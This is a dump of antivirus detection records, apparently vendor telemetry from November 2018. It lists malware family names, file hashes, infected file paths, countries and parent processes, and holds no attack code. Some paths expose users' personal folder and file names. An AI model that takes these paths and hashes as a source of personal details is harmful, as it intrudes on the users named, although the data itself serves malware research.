  Row(detection=Row(filename='form tugas guru sasaran titin luciana.exe', filepath='F:\\\xa0\\FORM TUGAS GURU SASARAN TITIN LUCIANA\\FORM TUGAS GURU SASARAN TITIN LUCIANA.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:30:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='terminator 2015.exe', filepath='F:\\\xa0\\terminator 2015\\terminator 2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:30:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sensory couple (2015) - complete.exe', filepath='F:\\\xa0\\Sensory Couple (2015) - Complete\\Sensory Couple (2015) - Complete.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:30:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.inf.exe', filepath='F:\\\xa0\\autorun.inf\\autorun.inf.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:29:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8f680e6c19e8a1153eb530b94525a0336cecd634c48304736f38ba5bc6387183', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries28.10.2018-4.available\\Avira\\8F680E6C19E8A1153EB530B94525A0336CECD634C48304736F38BA5BC6387183', filesize=3264000, name='TR/Crypt.XPACK.Gen.#M300.#R3923'), hash='8f680e6c19e8a1153eb530b94525a0336cecd634c48304736f38ba5bc6387183', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:24:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ahcremind.exe', filepath='C:\\Program Files\\Adobe\\Adobe Help Center\\ahcremind.exe', filesize=1536000, name='W32/Sality.AT.#M1.#R1'), hash='8f7f27476ea1e5821a30c00a349d26bf38ff5d65cfbaa1cf62eb2af0b5e34ec9', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Program Files\\\\\\\\HP\\\\\\\\HP Deskjet 1510 series\\\\\\\\bin\\\\\\\\HPStatusBL.dll\\\\\\",RunDLLEntry SERIALNUMBER=CN4C22P0BT05XJ;CONNECTION=USB;MONITOR=1;', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T07:14:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201447-e9f56ff1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-201337-DF643630\\AVSCAN-20181101-201447-E9F56FF1', filesize=64000, name='VBA/Dldr.Agent.eozfz.#M1.#R1'), hash='8fb99a6889b86a9f75de34c20a8bde0eb6c9632475cfae64a436de7a5f37f5f0', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:14:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rjco2so', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RJCO2SO', filesize=64000, name='VBA/Dldr.Agent.eozfz.#M1.#R1'), hash='8fb99a6889b86a9f75de34c20a8bde0eb6c9632475cfae64a436de7a5f37f5f0', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T17:32:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nekton.exe', filepath='\\\\?\\C:\\Program Files\\ANSYS Inc\\ANSYS 19.1 FULL\\v191\\icemcfd\\win64_amd\\icemcfd\\output-interfaces\\nekton.exe', filesize=3136000, name='PUA/BitcoinMiner.#M1.#R1'), hash='8fbe78dbc18aa86b7046b1ec5f7f5435ad1dd177150283a92fe55dbd49393933', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:12:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='eset.nod32.antivirus.12.0.27.0.(x86+x64).+.crack.[cracksnow].tar', filepath='\\\\?\\F:\\Installs\\ESET.NOD32.Antivirus.12.0.27.0.(x86+x64).+.Crack.[CracksNow].tar', filesize=206592000, name='BAT/HackAv.pdtmn.#M1.#R1'), hash='900a3a9673dccd35a282cfabebb4c25fede19e8cea78f747edf378550d9c40c7', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T05:29:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='newd162.tmp', filepath='\\\\?\\C:\\TMP\\NewD162.tmp', filesize=73744000, name='TR/Dropper.Gen.#M300.#R359'), hash='9054f39f7996268d48ac1bf8d439c0c78a834e463c922096a7e019d8be393949', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:32:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rjl80de', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RJL80DE', filesize=64000, name='HEUR/Macro.Downloader.PAAJ.Gen.#M1.#R1'), hash='90ce259cefd378651b6877fd42418775c3ad0aa752713a5761a068fa403a22d4', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:16:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-171855-b21531e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-171731-A569503C\\AVSCAN-20181101-171855-B21531E1', filesize=64000, name='HEUR/Macro.Downloader.PAAJ.Gen.#M1.#R1'), hash='90ce259cefd378651b6877fd42418775c3ad0aa752713a5761a068fa403a22d4', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:18:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='90ff5982afa65ff346f5e086b5553584586b437fb5703bd55c90f197cc5ded9c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\90FF5982AFA65FF346F5E086B5553584586B437FB5703BD55C90F197CC5DED9C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='90ff5982afa65ff346f5e086b5553584586b437fb5703bd55c90f197cc5ded9c', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:07:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='inv.48.ts.xls', filepath='D:\\СОФТ\\ФЛЕШКА\\надежда\\тарифная\\шаблоны с ЕИАС\\мониторинг выполн.произв программ в теплоснабжении\\INV.48.TS.xls', filesize=1792000, name='X2000M/Agent.3997.#M1.#R1'), hash='913e5ae8fa59e24bc6a3fa8eb354304469a5c22cdae47e6ef7d158189849fa81', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T17:36:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered fomer', filepath='C:\\WINDOWS\\SYSTEM32\\TASKS\\Yahoo! Powered fomer', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='9181846258d386386a8495c47d25fa0d650b9c3d89a88aefa19fed328dee4dbe', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:13:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered fomer', filepath='C:\\WINDOWS\\SYSTEM32\\TASKS\\YAHOO! POWERED FOMER', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='9181846258d386386a8495c47d25fa0d650b9c3d89a88aefa19fed328dee4dbe', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:15:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered fomer', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fomer', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='9181846258d386386a8495c47d25fa0d650b9c3d89a88aefa19fed328dee4dbe', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:31:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered fomer', filepath='C:\\WINDOWS\\SYSTEM32\\TASKS\\Yahoo! Powered fomer', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='9181846258d386386a8495c47d25fa0d650b9c3d89a88aefa19fed328dee4dbe', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:03:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='addcat.exe', filepath='D:\\pc drivers\\DP_Sound_Creative_13101 pult out\\Creative\\WinAll\\CR3\\wdm\\common\\i386\\Addcat.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='91afdbda3b0f0e7c2c56e8f770641c70add3b6f39c046a774be34ed5df7adabd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T02:30:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-033231-4c79968e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181031-004656-B5FD04F1\\AVSCAN-20181101-033231-4C79968E', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='91fba6fca031908e6969df03690860fda06ca2a0adc2f441703481a80d6e0185', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:32:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='922500ddc62333f8bbbff17e343518a3b40d6f7cbb4a8a83498de8cd7e73ae7e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\922500DDC62333F8BBBFF17E343518A3B40D6F7CBB4A8A83498DE8CD7E73AE7E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='922500ddc62333f8bbbff17e343518a3b40d6f7cbb4a8a83498de8cd7e73ae7e', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:53:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=2880000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='9254ec53a7518aca7468ff500b090a1d81a903035015be2127e6bd9c7590038c', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T18:54:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=2880000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='9254ec53a7518aca7468ff500b090a1d81a903035015be2127e6bd9c7590038c', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T15:06:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mc01010.exe', filepath='C:\\NOVA PASTA\\MCPED10\\BK\\MC01010.EXE', filesize=6080000, name='W32/Sality.AT.#M1.#R1'), hash='9272f64ba6d3ff5aa5199363b1b185f1929a2ec4b45a4762d944964806089fad', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:35:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mc01010.exe', filepath='C:\\NOVA PASTA\\MCPED10\\BK\\MC01010.EXE', filesize=6080000, name='W32/Sality.AT.#M1.#R1'), hash='9272f64ba6d3ff5aa5199363b1b185f1929a2ec4b45a4762d944964806089fad', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:35:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mylanviewer.exe', filepath='K:\\HBCD\\Programs\\MYLANVIEWER.EXE', filesize=64000, name='TR/Siggen.64000.8.#M1.#R1'), hash='928970136fecc731176bb438d4e172a4564f71cc3e402b006f5210c251f1a380', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:00:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190327-dfed4664', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-190327-DFED4664', filesize=64000, name='TR/Siggen.64000.8.#M1.#R1'), hash='928970136fecc731176bb438d4e172a4564f71cc3e402b006f5210c251f1a380', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:03:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='drq_prec.dll', filepath='C:\\CYPE Ingenieros\\Versión 2012\\programas\\drq_prec.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='92bd6c4799f60795f93ebee3011591b2d80c7ecff2deaa881b651d6f05d6c5c4', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T12:29:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='92e65e29a7b1cbbc547c8117191019d3d0e6c9040582295d08ae1dbdef0ed7c8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\92E65E29A7B1CBBC547C8117191019D3D0E6C9040582295D08AE1DBDEF0ED7C8', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='92e65e29a7b1cbbc547c8117191019d3d0e6c9040582295d08ae1dbdef0ed7c8', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:08:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='instmsiw.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\administration\\AFW\\afwv73\\Aspen Framework\\instmsiw.exe', filesize=1856000, name='W32/Small.L.#M1.#R1'), hash='931be25e2088d968b714c587ff245486b4eade3d6df13be9cfc113cdf72ad7fc', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe783_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe783 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T14:45:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='instmsiw.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\administration\\AFW\\afwv73\\Aspen Framework\\instmsiw.exe', filesize=1856000, name='W32/Small.L.#M1.#R1'), hash='931be25e2088d968b714c587ff245486b4eade3d6df13be9cfc113cdf72ad7fc', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:24:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='instmsiw.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\administration\\AFW\\afwv73\\Aspen Framework\\instmsiw.exe', filesize=1856000, name='W32/Small.L.#M1.#R1'), hash='931be25e2088d968b714c587ff245486b4eade3d6df13be9cfc113cdf72ad7fc', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe779_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe779 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T11:45:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rx4m0k0', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RX4M0K0', filesize=64000, name='VBA/Dldr.Agent.jwpvr.#M1.#R1'), hash='932852003f0eeca3b53e7b41990143fbb88010116ff01e297bc023d6ce4a677a', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183145-4551c87a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-183054-3DAB933E\\AVSCAN-20181101-183145-4551C87A', filesize=64000, name='VBA/Dldr.Agent.jwpvr.#M1.#R1'), hash='932852003f0eeca3b53e7b41990143fbb88010116ff01e297bc023d6ce4a677a', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:31:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='934fca9c1ec47f4cce1957f6c45fe39dca454c6b82744a4a53924878740b7408', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\934FCA9C1EC47F4CCE1957F6C45FE39DCA454C6B82744A4A53924878740B7408', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='934fca9c1ec47f4cce1957f6c45fe39dca454c6b82744a4a53924878740b7408', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:10:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='htdbm.exe', filepath='H:\\xampp\\apache\\bin\\htdbm.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='935a9f61557bc59de53e2260a99d29f4645109d101d40e4f12c0d1955c383125', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1716224, timestamp='2018-11-01T06:59:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-103357-0e67f9f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_27d3c769\\AVSCAN-20181101-103330-0B109C9C\\AVSCAN-20181101-103357-0E67F9F5', filesize=256000, name='TR/Qadars.AH.#M1.#R1'), hash='93ba4756d49ef347b1c8bbbcca894c11f724890e65ce09e3cc5ba61f90336a9f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-103419-112727f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_27d3c769\\AVSCAN-20181101-103330-0B109C9C\\AVSCAN-20181101-103419-112727F7', filesize=256000, name='TR/Qadars.AH.#M1.#R1'), hash='93ba4756d49ef347b1c8bbbcca894c11f724890e65ce09e3cc5ba61f90336a9f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:04:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cost done.exe', filepath='F:\\Toufiq Share\\saiful\\Costing\\Cost Done\\Cost Done.exe', filesize=512000, name='TR/Drop.Agent.bjxj.#M1.#R1'), hash='93f590521bdeaf93ea0a5140c7c75467005b5123f8c2de960cb7bbb77b2b6aa1', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T11:30:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-181718-23aee172', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_779bb4b9\\AVSCAN-20181101-181703-2088B88C\\AVSCAN-20181101-181718-23AEE172', filesize=512000, name='TR/Drop.Agent.bjxj.#M1.#R1'), hash='93f590521bdeaf93ea0a5140c7c75467005b5123f8c2de960cb7bbb77b2b6aa1', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T12:17:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-081830-ffdff1e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_36a12076\\AVSCAN-20181101-081728-F44B9C1B\\AVSCAN-20181101-081830-FFDFF1E6', filesize=40000, name='HTML/Infected.WebPage.Gen.#M1.#R1'), hash='941728eae9f2e067adc34f1fa8a4f497540d0fba9e95eb26b0593b3aa11d28fc', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T12:18:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='82085e7b68aca89cf19ff417e05680a940923771', filepath='C:\\Users\\X\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\31bq7vmx.default\\cache2\\entries\\82085E7B68ACA89CF19FF417E05680A940923771', filesize=40000, name='HTML/Infected.WebPage.Gen.#M1.#R1'), hash='941728eae9f2e067adc34f1fa8a4f497540d0fba9e95eb26b0593b3aa11d28fc', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=510928, timestamp='2018-11-01T12:17:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ddodiag.exe', filepath='\\\\?\\C:\\Windows\\System32\\ddodiag.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='942e5fb4b0763132e51440dc2191881a1cf731e39ec68cad3a555604f4523228', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:51:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-163142-b479ccb6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de473176\\AVSCAN-20181101-162541-91A22639\\AVSCAN-20181101-163142-B479CCB6', filesize=640000, name='HEUR/AGEN.1000013.#M1.#R1'), hash='948ced06aa3f80c3fa273973ae307895ddcd5b90651f7fe04f292c5eaced7e61', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:32:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='94c899075fd0f2ea9c7a7170d5e94ea2a4f506c738141d63194d144a233f60a4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\94C899075FD0F2EA9C7A7170D5E94EA2A4F506C738141D63194D144A233F60A4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='94c899075fd0f2ea9c7a7170d5e94ea2a4f506c738141d63194d144a233f60a4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:16:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hdeck.exe', filepath='D:\\Omarlys\\CONTACTOS OMARLYS\\VIA_Win7-64_Win7_Vista64_Vista_XP64_XP_2K(v7700d)\\VIAHDAud\\Present\\HDADeck\\HDeck.exe', filesize=33792000, name='W32/Sality.AT.#M1.#R1'), hash='94daaf7ace0c643160d72ae93d67c7421c433db4d5f8ea38279a0b5d9115fa13', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Nox\\bin\\Nox.exe', parentsize=6017792, timestamp='2018-11-01T10:02:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hdeck.exe', filepath='D:\\Omarlys\\CONTACTOS OMARLYS\\VIA_Win7-64_Win7_Vista64_Vista_XP64_XP_2K(v7700d)\\VIAHDAud\\Present\\HDADeck\\HDeck.exe', filesize=33792000, name='W32/Sality.AT.#M1.#R1'), hash='94daaf7ace0c643160d72ae93d67c7421c433db4d5f8ea38279a0b5d9115fa13', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Nox\\bin\\Nox.exe', parentsize=6017792, timestamp='2018-11-01T09:36:39Z'), dt=datetime.date(2018, 11, 1)),
